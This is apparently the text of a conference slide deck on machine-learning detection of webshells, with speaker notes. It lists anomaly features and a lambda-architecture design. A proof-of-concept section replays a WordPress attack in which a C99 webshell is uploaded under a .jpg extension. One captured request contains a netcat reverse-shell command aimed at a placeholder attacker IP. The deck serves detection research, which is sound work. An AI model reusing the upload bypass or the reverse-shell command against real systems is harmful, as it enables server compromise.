  • 35. How do we Detect Webshells Using ML: Global Stats Anomalies on rare paths U->S S->U !! U->U (LAN to LAN) S->S (DMZ to LAN)!! Desktop Server Desktop Laptop LAN AssetDMZ Server
  • 36. Seeing the Analytic In Action
  • 37. Seeing the Analytic In Action
  • 38. Seeing the Analytic In Action Once identity resolution/learning process is complete we create new anomalies based on new paths/actions that are rare for a particular population profile Lightweight Webshell in the DMZ
  • 39. How do we detect Webshells using ML... Based on these indicators we look for sequential behaviors. For example we can look at sequence of requests for a fixed (IP/User, Web server). We can use bro logs, web server logs and perimeter traffic as well as long as we have visibility into the application layer. By determining these sequences we can discern between benign behavior and sequences of behaviors that indicate webshell like activity.
  • 41. How do we Detect Webshells Using ML: Local Stats Using Machine Learning techniques we can compute and build up statistics around some key data points. In the context of this particular vector we can use rare means/ low frequency count for a fixed website: - Rare time of site usage, - Rare time stamping and creation of files, - Rare connection pat- terns, Large number of POST/GET Requests to specific file, - Connection strings with command arguments (cmd.exe, /bin/bash, nc), - Unusual Direct connections to files exposed to the internet, - Unusual UA in comparison to normal traffic patterns when users, visit website or search, engine indexing site.
  • 42. Webshell detection POC/Example For proof of concept we gather data of benign and normal browsing behavior and then we proceeded to replicate a RFI (Remote File Inclusion) uploading a C99 webshell to target host. In this particular sequence of referrer items it can be seen how the attacker is browsing around the site possibly foot printing and searching for input fields.
  • 43. Webshell detection POC/Example Referrer sample sequence below shows browsing around victim web site: -Referer: http://victimdomain/wordpress/?p=9 -Referer: http://victimdomain/wordpress/wp-content/themes/default/style.css -Referer: http://victimdomain/wordpress/wp-content/plugins/category-grid-view- gallery/css/style.css?ver=2.8.5 Further review of referrers show access to wordpress: Referer: http://victimdomain/wordpress/wp-login.php Referer: http://vicitimdomain/wordpress/wp-admin/
  • 44. Webshell POC/Example The following sequence shows the attacker accessing the post feature and uploading a C99 shell bypassing sanitation controls by adding a .jpg extension to the actual shell “c9920161.php”. This is done by abusing the new post feature that includes uploading media: 00:28:39.469021 IP attackerIP.51399 > victimdomain.80: Flags [P.], seq 13419:14264, ack 145980, win 4096, options [nop,nop,TS val 787343940 ecr 195280], length 845: HTTP: GET /wordpress/wp-content/plugins /a-gallery/timthumb.php?src=http://victimdomain/ wordpress/wp-content/uploads/2016/06/c992016.php. jpg&w=125&h=125&zc=1 HTTP/1.1...D....GET /wordpress /wp-content/plugins/a-gallery/timthumb.php?src=http ://victimdomain/wordpress/wp-content/uploads /2016/06/c9920161.php.jpg&w=125&h=125&zc=1 HTTP/1.1
  • 45. Webshell detection POC/Example Referrer: http://victimdomain/wordpress/wp-admin/post-new.php (Here is where the web shell is uploaded) Finally, by looking at the example for referrer sequences it can be seen how by the attacker browsing to the web shell, frequency of access indicates a signal for operator behavior in the sequential component of the TTP: Referer: http://victimdomain/wordpress/?p=13 Referer: http://victimdomain/wordpress/wp-content/ uploads/ Referer: http://victimdomain/wordpress/wp-content/uploads/2016/ Referer: http://victimdomain/wordpress/wp-content/uploads/2016/06/ Referer:http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg
  • 46. Webshell detection POC/Example In the following packet capture snippet it can be seen how attacker uses netcat to send a reverse shell utilizing C99 command execution feature: 00:33:26.996555 IP attackerIP.51421 > victimdomain.80: Flags [P.], seq 0:1014, ack 1, win 4117, options [nop,nop,TS val 787630908 ecr 267163], length 1014: HTTP: POST /wordpress/wp-content/uploads/2016/06/c9920161.php.jpg HTTP/1.1E..*..@[email protected] .....U......%........K<....POST /wordpress/wp-content/uploads/2016/06/c9920161.php.jpg Referer: http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8,es;q=0.6 Cookie: wordpress_test_cookie=WP+Cookie+check;wordpress_logged_in_c8c9d8ea3e0f27d770e745c21c00f45e =test%7C1465100854%7Cd83074c4a4a1c097c4eb44b42165d190; wp-settings-time-2=1464928107; PHPSESSID= cav3sgkd273gafknm9pb13m467act=cmd&cmd=nc+-e+%2Fbin%2Fbash+attackerIP+9999&d=%2Fvar%2Fwww%2 Fwordpress%2Fwp-content%2Fuploads%2F2016%2F06%2F&submit=Execute&cmd_txt=1
  • 48. Effective Webshell detection via machine Learning • Webshell ML Detection Paradigm • Two models of Behavior: Local behavior and Global Asset Behavior • Local behavior is further broken down into individual history per path in a Webserver. The webserver model is maintained as two separate individual graphs one for dynamic content and one for static content • Feature Vectors for the local content and path anomalies on a per webserver basis are then correlated with global asset path behaviors.
  • 49. Conclusion - Machine Learning & Big data technologies enhance detection beyond the simple static based signature defense technologies. - It is possible to establish sequences of behaviors that indicate webshell access and use. - The data is already there. You can use your perimeter logs (Proxy, Firewalls, Bro, Web Gateway, etc). - Detection mechanisms can also be enhanced and extended by covering any other measurable attack vector that delivers a web shell payload (SQli, XSS, other types of RFI, etc).
  • 50. Q&A
  • 51. Appendix Operational ML: How to Detect Attack Patterns That Change Over Time
  • 52. Step 1: Break the problem in to use cases
  • 53. Step 2: Find what use cases have highest security impact
  • 54. Step 3: Decompose the problem into two types of computation
  • 55. Step 3: Decompose the problem into two types of computation Arbitrary User Behavior = Sequential Component + “Un- Ordered” Component
  • 56. Step 3: Decompose the problem into two types of computation Arbitrary User Behavior = Sequential Component + “Un- Ordered” Component Examples Sequential Behaviors 1. Exploit Chains 2. Timing Analysis (Periodicity) 3. Active Directory Sequence 4. Authentication Graph Non Sequential Behaviors 1. Fingerprinting 2. Grouping Behaviors 3. Application Counts 4. Rare file extension counts for Webshell detection
  • 57. Step 3: Decompose the problem into two types of computation Arbitrary User Behavior = Sequential Component + “Un- Ordered” Component Mapping Behaviors to Computational Paths Easy to Parallelize 1. Count() 2. Average() 3. Time series() 4. Local state computations Per user/IP/account/… Hard to Parallelize (NC Complete Complexity) 1. Rank() 2. Median 3. Anything that keeps track of globalstate 4. Machine Learning Computations
  • 58. Step 4: Build an ML Model for each important sub-behavior
  • 59. Step 4: Build an ML Model for each important sub-behavior Each Model can be batch, real-time or hybrid mode
  • 60. Step 5: Operationalize the Model Life Cycle
  • 61. Step 5: Operationalize the Model Life Cycle How do we programmatically learn new patterns over time?
  • 62. Step 5: Operationalize the Model Life Cycle How do we programmatically learn new patterns over time? When is an ML model Ready 1. When should we re-train? 2. How should new data weighted over old data? 3. How do we know when a model is ready?
  • 63. Step 5: Operationalize the Model Life Cycle How do we programmatically learn new patterns over time? When is an ML model Ready 1. When should we re-train? 2. How should new data weighted over old data? 3. How do we know when a model is ready?
  • 64. Step 5: Operationalize the Model Life Cycle How do we programmatically learn new patterns over time? When is an ML model Ready 1. When should we re-train? 2. How should new data weighted over old data? 3. How do we know when a model is ready?
  • 65. The Lambda Defense: A Complex Design Pattern
  • 66. 67 DHCP IMS/IPA M FW Prox yVPN AD Real Time Identity Resolution Distributed ETL Username = select coallesce(user_na me, hostname, IP) from Active_ID_Table where IP = ‘10.10.100.23) IP DHCP.MAC DHCP_Lasteventtime AD_FQDN 10.100.1.23 58:5c:35:c3:6e:a4 2014-03-11T14:00:00 joe.eng.acme.com 10.13.11.221 12:3a:74:b2:6a:22 2014-03-12T14:30:00 ad.hr.acme.com Sequential Models and IOC’s Data Ingest Large Scale Models and Non-Sequential IOC’s Real Time Layer Batch Layer Hybrid View (Batch + Real Time)

Editor's Notes

  • #21: Context: shades of grey is a good thing. People in security tend to think black and right -> rules are brittle. Shades of grey is good: Machine Learning Defend as Layered security strategy Examples of where certain kindfs of behavior wont confirm to a rule. How sequencing a bunch of small indicators and Evidence from small hetergenous: Black and white is good -> you are not transacting in blackh Rules Stastistics Humans Simple question I use to assess the security posture of large enterprises hwo easy can they answer this question: ”For every network request in our network can we determine the individual process on the host that generated the request”
  • #22: Evidence from small hetergenous: 100 files -> is not bad because it has not triggered the 10GB rule yet Peer group -> never moves more than 10 files Vpn sesion -> comes from a small geolocation Weaving a whole story based on the Black and white is good -> you are not transacting in blackh
  • #23: Evidence from small hetergenous: 100 files -> is not bad because it has not triggered the 10GB rule yet Peer group -> never moves more than 10 files Vpn sesion -> comes from a small geolocation Weaving a whole story based on the Black and white is good -> you are not transacting in blackh
  • #24: Evidence from small hetergenous: 100 files -> is not bad because it has not triggered the 10GB rule yet Peer group -> never moves more than 10 files Vpn sesion -> comes from a small geolocation Weaving a whole story based on the Black and white is good -> you are not transacting in blackh
  • #25: Evidence from small hetergenous: 100 files -> is not bad because it has not triggered the 10GB rule yet Peer group -> never moves more than 10 files Vpn sesion -> comes from a small geolocation Weaving a whole story based on the Black and white is good -> you are not transacting in blackh
  • #26: Evidence from small hetergenous: 100 files -> is not bad because it has not triggered the 10GB rule yet Peer group -> never moves more than 10 files Vpn sesion -> comes from a small geolocation Weaving a whole story based on the Black and white is good -> you are not transacting in blackh